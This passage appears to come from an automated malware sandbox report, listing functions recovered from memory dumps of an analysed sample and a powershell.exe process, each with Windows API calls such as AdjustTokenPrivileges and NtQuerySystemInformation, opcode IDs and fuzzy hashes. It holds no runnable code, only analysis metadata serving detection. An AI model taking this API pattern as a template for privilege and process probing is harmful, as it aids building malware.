                                                    • Instruction ID: e25bbe583f21b67b3174cd77041188ed4fe4dbcd40460256969cbfc0e6438095
                                                    • Opcode Fuzzy Hash: 4a573ba5e480626ed8ab395a47c9da478002202b3b1e167898eae1832d90ec19
                                                    • Instruction Fuzzy Hash: A601D672509384AFD7128F15EC40953BFF8DF47630B0980EBEC888B212D269B909CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02A5081E, Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2187093315.0000000002A50000.00000040.00000040.sdmp, Offset: 02A50000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80a9aefd70f03b9ee78ff1fb2923c3b2d59cfcdd53ee28ef937aa268bea0882a
                                                    • Instruction ID: ffff72688da756fbf1b86d7889937730ea448cc73cb6961573c7dcd56c8c3c0e
                                                    • Opcode Fuzzy Hash: 80a9aefd70f03b9ee78ff1fb2923c3b2d59cfcdd53ee28ef937aa268bea0882a
                                                    • Instruction Fuzzy Hash: 6DE092766047049BD750CF0AEC81462F7D8EB84A30B58C07FDC0D8B701D139B904CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05710864, Relevance: .0, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2201364754.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 61c92c891b9bfc5b9640d1409056594c89595c63ff0af6e9bd93b31f629f4864
                                                    • Instruction ID: bd6d4e50f04d72f3c9b3297f23b6216d7b30e5e955e02d953ac7376197cac827
                                                    • Opcode Fuzzy Hash: 61c92c891b9bfc5b9640d1409056594c89595c63ff0af6e9bd93b31f629f4864
                                                    • Instruction Fuzzy Hash: F1E01A2220E3D14FC30797A4A8A4468BFA11D9306430E00DBD581DF1A7D94C9889D7B7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004323F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180790003.0000000000432000.00000040.00000001.sdmp, Offset: 00432000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa286bb1a579c5fc7183224e51e1b9e094849f58a171f2ac5c23be7752e6920b
                                                    • Instruction ID: 30fac88c69bcba488cfd40db9d50457fd7589ac19a47a9657b9fb38a3f72609c
                                                    • Opcode Fuzzy Hash: fa286bb1a579c5fc7183224e51e1b9e094849f58a171f2ac5c23be7752e6920b
                                                    • Instruction Fuzzy Hash: B8D05E79204A918FD7168A1CC2A4B963794AF69B04F4644FAE840CB7A3C7A8F981D200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004323BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180790003.0000000000432000.00000040.00000001.sdmp, Offset: 00432000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62d006b1eedf6d053237d2fb17f1f39a6b1cec49dff57582ea56670e3ddba147
                                                    • Instruction ID: ed60e9dbdda5474f1806529effb385906930a7117cf566b70f2509150b7db22c
                                                    • Opcode Fuzzy Hash: 62d006b1eedf6d053237d2fb17f1f39a6b1cec49dff57582ea56670e3ddba147
                                                    • Instruction Fuzzy Hash: F2D05E343406818FDB15DA2CC294F5A73E4AF44B00F0644E9BC008B366C3ACE880C604
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: powershell.exe PID: 1900 Parent PID: 1192 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 01DEACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01DEAD37
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 1b3131f482e773b7e9f7b1a8ce34d29aed548ae8a48400b2027949c49d353561
                                                    • Instruction ID: bc80a28a63ccca0d8cb0d30e4a17a376acc53da528e8b3d1d3127edaab09646b
                                                    • Opcode Fuzzy Hash: 1b3131f482e773b7e9f7b1a8ce34d29aed548ae8a48400b2027949c49d353561
                                                    • Instruction Fuzzy Hash: 4C21D1765097849FEB238F29DC44B92BFF4EF06311F0984DAE9848B163D2719918DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01DEAD37
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: d2ac24ed47f1989d168741db9132d70aeb3ccbd9d11252471cb26770b06fcf22
                                                    • Instruction ID: 2cf63aee6a4742f761d014e3a2d986e28562fb64dd4e873f9c84cc4136965cbe
                                                    • Opcode Fuzzy Hash: d2ac24ed47f1989d168741db9132d70aeb3ccbd9d11252471cb26770b06fcf22
                                                    • Instruction Fuzzy Hash: 4B11A375500705DFEB21DF59D844B56FBE4EF04221F04C46AED458B612D371E414CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01DEB329
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 7970d68453bb92fe6443908b7d11362328c79903a2f9d9e846b3d42db4434fb9
                                                    • Instruction ID: 109edb54059839593dc622acb666b1edf9f0d1d5ba3ad234dbebd952a784c3f4
                                                    • Opcode Fuzzy Hash: 7970d68453bb92fe6443908b7d11362328c79903a2f9d9e846b3d42db4434fb9
                                                    • Instruction Fuzzy Hash: 9011A071509780AFDB228F15DC45F62FFB4EF06220F09849BED844B663C275A918DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01DEB329
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 11aacef32faf43e4617a8f26b9ac979f4953303a339dc5cdb9ff490ec4e4a509
                                                    • Instruction ID: 01df119b6dc12a71a38471cf7fca7387616f39f1c8145568309180d0746163c8
                                                    • Opcode Fuzzy Hash: 11aacef32faf43e4617a8f26b9ac979f4953303a339dc5cdb9ff490ec4e4a509
                                                    • Instruction Fuzzy Hash: 1401AD36400700DFEB219F19D88AB25FBE0EF08721F08C09BDD894B612C275F418DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C0118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027C01D0
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 3dbd80381d4b3a0d93551c0640e503d573da8368b4a011ed68ebcdc1cc349e38
                                                    • Instruction ID: 41fa2d9d9619c28408c59ebc9826eefe10797d8d77419f46ab17141e81b3a99b
                                                    • Opcode Fuzzy Hash: 3dbd80381d4b3a0d93551c0640e503d573da8368b4a011ed68ebcdc1cc349e38
                                                    • Instruction Fuzzy Hash: 1E31397654E3C08FD7138B759C65692BFB4AF03310B0E84DBD884CF1A3D6259909D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 027C072D
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 3e10800ffc73a6caa42378eadbdd4cd95ad5ecbbe9327f70c6a7fe3b9add0690
                                                    • Instruction ID: a3e230970df089fa3fdd1ea6bcb15f9e41a109a3dfdf7e460e358c99991ed502
                                                    • Opcode Fuzzy Hash: 3e10800ffc73a6caa42378eadbdd4cd95ad5ecbbe9327f70c6a7fe3b9add0690
                                                    • Instruction Fuzzy Hash: 7C317071504380AFE722CF65CC45F52BFF8EF05310F0984AEE9888B292D325A908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C0D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 027C0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 1a40a207d0744221e2f1967a0aac2688231811b788028ffbe5153c13b42b5223
                                                    • Instruction ID: f48e489ca6f2ac25589b835f7d1160fb363bd5bb788579eabe67cdccaf8cba46
                                                    • Opcode Fuzzy Hash: 1a40a207d0744221e2f1967a0aac2688231811b788028ffbe5153c13b42b5223
                                                    • Instruction Fuzzy Hash: 9B3186B1509380AFE712CB25DC45B96BFE8DF06314F1884AEE944CB293D375A905C775
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEBD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 01DEBDBC
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: f0db943a4e4549be830d4db29dc250a20067332a47e745dda485a9933f7203d5
                                                    • Instruction ID: 35e030ed26085325c17cd382fee5b5ba47045d06a1a642856d79a93f95b5468f
                                                    • Opcode Fuzzy Hash: f0db943a4e4549be830d4db29dc250a20067332a47e745dda485a9933f7203d5
                                                    • Instruction Fuzzy Hash: 19318172509380AFE722CB61DC55F96BFB8EF06210F0885DBE985DB193D225A908C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEAF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 01DEAFBE
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: ac5b0ca0cdc34ec37711cd7db25839dcfd9a6665ff2fa309364152b561d49aa2
                                                    • Instruction ID: a33a014d16655350099e03c52a69d51feead284618001dba1463f1eed9e1bcaa
                                                    • Opcode Fuzzy Hash: ac5b0ca0cdc34ec37711cd7db25839dcfd9a6665ff2fa309364152b561d49aa2
                                                    • Instruction Fuzzy Hash: 2821D6B2509780AFE712CF24DC45B96BFB8EF06320F0884DBE985DB193D265A949C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C0FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 027C109E
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: fb0a0ee741367ddaff6f635f0ad6222948e1da838f4ec6e82e27cd2bc0de07b8
                                                    • Instruction ID: 897b2ff1864b09e8fb6c1f34ed82a1bc01e71bbe9ba1f9dd815f0d7172bfd87c
                                                    • Opcode Fuzzy Hash: fb0a0ee741367ddaff6f635f0ad6222948e1da838f4ec6e82e27cd2bc0de07b8
                                                    • Instruction Fuzzy Hash: C5315E7550E3C06FD3138B358C55B66BFB4AF43610F1A81DBD8848F2A3D629A919C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEB01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 01DEB0AE
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: f434d9920c1a2fab521c21888a1f09a9ade56bb80fa632b3682a6716c496093e
                                                    • Instruction ID: 7c30e20e7d2e70a2eb43999b9b8017226aab9ee50cc62fb845dfcb3efc5578d0
                                                    • Opcode Fuzzy Hash: f434d9920c1a2fab521c21888a1f09a9ade56bb80fa632b3682a6716c496093e
                                                    • Instruction Fuzzy Hash: AE218371505380AFE722CF25DC45FA6BFF8EF46220F08849BE945DB152D664E948CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C0784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 027C0819
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 57715c8351364a128bac022a5535317c2026d1e77463797c5666ec8134df3413
                                                    • Instruction ID: 96c3b6f5908064049a84a5c9648b8045f43e74d4a35c7d0213a399072141ce6f
                                                    • Opcode Fuzzy Hash: 57715c8351364a128bac022a5535317c2026d1e77463797c5666ec8134df3413
                                                    • Instruction Fuzzy Hash: 7C21FC76408780AFE712CB259C45FA3BFA8EF46720F1981DBF9848B193D224A905C7B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEA1A8, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01DEA23E
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: dc9137183b891a7e028f47946812dc565543d6b43beffe9e73d4dfe68a93fed4
                                                    • Instruction ID: 766785e0d1fc07e2218e055f7af29fd359a9c0da50bb895412e3019b0776f9a8
                                                    • Opcode Fuzzy Hash: dc9137183b891a7e028f47946812dc565543d6b43beffe9e73d4dfe68a93fed4
                                                    • Instruction Fuzzy Hash: 0721C77184D3C06FD312CB258C55B66BFB4EF47620F1981DBD884CF293D229A919C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C0464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 027C0502
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: d4a1579bdb9e474bcc192c63273b150afc4f33b2a82497fa7d40612be531b3d9
                                                    • Instruction ID: b976185edee3c0aa759a694a19906cc0f61d383d7e4faf33da026fe9b47c733c
                                                    • Opcode Fuzzy Hash: d4a1579bdb9e474bcc192c63273b150afc4f33b2a82497fa7d40612be531b3d9
                                                    • Instruction Fuzzy Hash: C5217F7640E7C0AFD3128B358C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C06AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 027C072D
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: f7e95b8c758cd8cee7204e69103c9a906ff2e5bd23e2619da74a4e1056593f57
                                                    • Instruction ID: d7f96d25eb6db40e334e241b94550e7c1b3ec93d4e0b0376332353cbca4f4eb9
                                                    • Opcode Fuzzy Hash: f7e95b8c758cd8cee7204e69103c9a906ff2e5bd23e2619da74a4e1056593f57
                                                    • Instruction Fuzzy Hash: 97219A71500700EFEB21DF65CD85B66FBE8EF08310F14846EE9899A292D331E904CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C0854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 027C08E5
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 7b48cd40da4443a341b1360722f8c5c0c1add12d23ce01acb5c9f9c11e1e0ada
                                                    • Instruction ID: 5612ae75bd916a615a30e6f2e4be91ca389aab2362aae06b1e7f1c2a1265a9c6
                                                    • Opcode Fuzzy Hash: 7b48cd40da4443a341b1360722f8c5c0c1add12d23ce01acb5c9f9c11e1e0ada
                                                    • Instruction Fuzzy Hash: D5219272409380AFE722CF61DC45F56BFB8EF06314F0984DFE9449B153C265A909CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEA8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01DEA94A
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 86c70f5d5ce61dd72b7121eda1ab3c4d82d276e203e44860a3dcb10e71ed2dcc
                                                    • Instruction ID: ddc4cc6cceb1e91fcf143b66f6be9b284e8f07e1adaefca20d319bdd2f023ddb
                                                    • Opcode Fuzzy Hash: 86c70f5d5ce61dd72b7121eda1ab3c4d82d276e203e44860a3dcb10e71ed2dcc
                                                    • Instruction Fuzzy Hash: 5C21A77540D780AFD3138B25DC51B62BFB4EF87720F0981DBE8848B653D224A919C7B6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C0D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 027C0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 9127afbcc57ff5f84f7cded522dec9c068cf2d359d2f1adda56111c569efd1a2
                                                    • Instruction ID: f57f66579767fee85869392428f3c86dad3ddb7d561093fb7bdc1c2ea17a3761
                                                    • Opcode Fuzzy Hash: 9127afbcc57ff5f84f7cded522dec9c068cf2d359d2f1adda56111c569efd1a2
                                                    • Instruction Fuzzy Hash: A4216DB1600240EFE720DB25DC85BA6FBD8EF04724F1484AEE948DB282D775E904CAA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEBD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 01DEBDBC
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 012fb8d4e59d898d703beb929dea99a9c5e3165dc6b89f56ff2aea62e8e2ea62
                                                    • Instruction ID: 4ff1d49bbc850ecf5fc9aa7afdfa4b9d0595c9ce2653c118252499bdbdf88557
                                                    • Opcode Fuzzy Hash: 012fb8d4e59d898d703beb929dea99a9c5e3165dc6b89f56ff2aea62e8e2ea62
                                                    • Instruction Fuzzy Hash: 1A119D72500704EFEB21DF65DC85FAAFBE8EF04720F04856AF945DA241D675A9048BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: daba518553eb7ca5148bc0b77cd20f64e8dbe9731cf9d982139f9ec2cc6c3b8c
                                                    • Instruction ID: b58b2f4eecff8b576dac37a5514fe7e51d0308a526bfa5c456321bfe2b47e0b3
                                                    • Opcode Fuzzy Hash: daba518553eb7ca5148bc0b77cd20f64e8dbe9731cf9d982139f9ec2cc6c3b8c
                                                    • Instruction Fuzzy Hash: 82218E765087809FEB21CF25DC45B96BFB4EF06220F0884AEED858B663D235A448DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C0F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 027C0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 5cd7585ea79dd7224cc776f466c6d9b027ebf4722edc763677408e8900a90f14
                                                    • Instruction ID: 99f0223cf0168b4c2020b2df11c484fd35ed583074fbe2865a158c8c863c0ee3
                                                    • Opcode Fuzzy Hash: 5cd7585ea79dd7224cc776f466c6d9b027ebf4722edc763677408e8900a90f14
                                                    • Instruction Fuzzy Hash: 44218E7150D3C09FDB128B25DC55B92BFB4EF03224F1C84DAD8888F253D2649548C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEB04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 01DEB0AE
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: f4d5c1fc8c2fd3c1f5bccab52118557c8e79c8f2a8dc74567c986ad3dd4e95ce
                                                    • Instruction ID: ca1ae88ac70b8786b3b2aefea905857b61b3cf701070c19934ff0944506f546b
                                                    • Opcode Fuzzy Hash: f4d5c1fc8c2fd3c1f5bccab52118557c8e79c8f2a8dc74567c986ad3dd4e95ce
                                                    • Instruction Fuzzy Hash: 86117F75600700EFEB21DF15DC85FA6BBE8EF05661F14846BE945CB241D674F9048AA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEBABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: 89bc9a0de2a7377919d0201590d43f3c8f8aace0b3ecc364dbc012009c1166a3
                                                    • Instruction ID: 53a4c07f5c8a025609f33187dc3d5259afe620daf2e8aca681213aac218dc834
                                                    • Opcode Fuzzy Hash: 89bc9a0de2a7377919d0201590d43f3c8f8aace0b3ecc364dbc012009c1166a3
                                                    • Instruction Fuzzy Hash: 4A21A1765093C09FEB128B25DC55A92BFE4EF07220F0984DBDD858F263D224A908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEAAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01DEAB1A
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: a5bcb56b3d2d2f5c6d4dfa70f300ab9c8083dbaee7d19c6ea6652e62f1f581d4
                                                    • Instruction ID: f421c69a3dc432ff00b40d0acd27e59547d00547a5bebe03e73e047caea7f1a5
                                                    • Opcode Fuzzy Hash: a5bcb56b3d2d2f5c6d4dfa70f300ab9c8083dbaee7d19c6ea6652e62f1f581d4
                                                    • Instruction Fuzzy Hash: 842172716053819FEB22CF29DC44B52BFE8EF56211F0884AAED49CB253D265E404CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027C10D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 027C1148
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2188772604.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: ea694306d1de28303e003722870fd0ce08611b8f7178a112a881e13dbe2bb622
                                                    • Instruction ID: bae08750052c2c81944cd6bc37cb61d2b799bd4929aec77148d4dcc1c17f653f
                                                    • Opcode Fuzzy Hash: ea694306d1de28303e003722870fd0ce08611b8f7178a112a881e13dbe2bb622
                                                    • Instruction Fuzzy Hash: 21216D6540D3C49FD7138B259C54A62BFB4EF57720F0980DBD8848F2A3D2695808D7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01DEAF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9DAC03F9,00000000,00000000,00000000,00000000), ref: 01DEAFBE
                                                    Memory Dump Source
                                                    • Source File: 00000026.00000002.2182993651.0000000001DEA000.00000040.00000001.sdmp, Offset: 01DEA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
